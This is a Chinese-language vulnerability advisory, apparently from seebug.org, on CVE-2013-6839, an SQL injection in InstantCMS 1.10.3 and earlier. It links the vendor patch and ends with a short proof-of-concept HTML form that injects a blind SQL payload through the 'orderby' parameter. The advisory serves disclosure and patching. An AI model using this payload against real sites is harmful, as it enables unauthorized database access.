InstantCMS SQL注入漏洞

2013-12-1600:00:00

Root

www.seebug.org

0.003 Low

EPSS

Percentile

63.0%

JSON

CVE(CAN) ID: CVE-2013-6839

InstantCMS是一款内容管理系统。

InstantCMS存在SQL注入漏洞，由于传递的"/catalog/[id]"的"orderby" HTTP POST参数未充分过滤，允许远程攻击者利用漏洞提交特制的SQL查询，可操作或获取数据库数据。
0
InstantCMS<=1.10.3
厂商补丁：

InstantCMS

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://www.instantcms.ru/download/patch/security_update_for_iCMS_1.10.3_21-11-2013.zip


                                                Simple exploit code below uses blind SQL injection exploitation technique, and will display different order of records on the page if MySQL version is 5.*:
&lt;form action=&quot;http://[host]/catalog/2&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;orderby&quot; value=&quot;(-pubdate*(substring(version(),1,1)=5))&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;orderto&quot; value=&quot;asc&quot;&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;

0.003 Low

EPSS

Percentile

63.0%

JSON

Related for SSV:61116